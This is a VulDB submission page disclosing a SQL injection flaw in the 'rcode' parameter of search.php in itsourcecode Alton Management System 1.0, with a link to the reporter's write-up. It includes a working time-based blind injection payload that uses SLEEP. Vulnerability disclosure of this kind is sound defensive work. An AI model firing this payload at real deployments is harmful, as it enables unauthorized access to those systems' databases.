Submit #381089: itsourcecode Alton Management System 1.0 SQLi search.php情報

Titleitsourcecode Alton Management System 1.0 SQLi search.php
DescriptionThe rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection. -------------------POC--------------- Parameter: rcode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq
Source⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
User
 Dee.Mirage (ID 71702)
Submission2024年07月27日 12:20 (2 months ago)
Moderation2024年07月30日 15:29 (3 days later)
Status承諾済み
VulDB Entry273142
Points20

Do you need the next level of professionalism?

Upgrade your account now!